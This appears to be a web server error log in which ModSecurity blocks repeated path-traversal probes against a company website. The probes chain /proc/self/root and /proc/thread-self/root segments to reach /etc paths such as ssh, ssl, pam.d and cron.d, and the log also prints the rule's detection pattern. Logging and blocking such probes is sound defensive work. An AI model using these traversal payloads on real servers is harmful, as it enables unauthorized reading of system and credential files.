[Fri Mar 20 03:40:58.269396 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.241.31:45406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr-hCii7xarUs8iHYzCgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:40:59.682355 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.241.31:45418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr-_XLqtnMIWvjpaJoHAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:01.374982 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:40622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzr_QF0L0L-SsrnPo43JAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:10.347670 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:48862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsBhCii7xarUs8iHYzHQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:11.654670 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:49270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsB_XLqtnMIWvjpaJoIgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:14.049839 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:45430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsCBCii7xarUs8iHYzIgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:14.060073 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.243.128:49286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsCV1pVZ5mVmJwsFMAtwAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:16.723819 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.241.31:40544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsDF1pVZ5mVmJwsFMAugAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:18.008370 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:42840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsDvXLqtnMIWvjpaJoJQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:19.442672 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.241.31:42850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsD11pVZ5mVmJwsFMAvAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:23.909498 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:49298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsE_qxLDW4GITHUkSw3QAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:26.069860 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:42856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsFjJ3M9BSuKP7CAbfAwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:28.491305 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:60464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsGBCii7xarUs8iHYzKQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:29.620183 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:40162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsGQF0L0L-SsrnPo43MwAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:29.774841 2026] [mime_magic:error] [pid 7235:tid 140411674785536] (70014)End of file found: [client 57.141.18.57:35272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:41:31.489433 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:60476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsGrninkcc-iUj5Aos6AAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:35.150525 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:42152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsH_XLqtnMIWvjpaJoMgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:36.141472 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:60486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsIAF0L0L-SsrnPo43OQAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:38.472736 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.241.31:50308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsIhCii7xarUs8iHYzMAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:39.687487 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:42168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsI-oXxyEfFpUF8f9S_AAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:39.798949 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:50320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsI9a6ubjKNq_cu4adeQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:41:41.039679 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:56236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsJfXLqtnMIWvjpaJoNQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
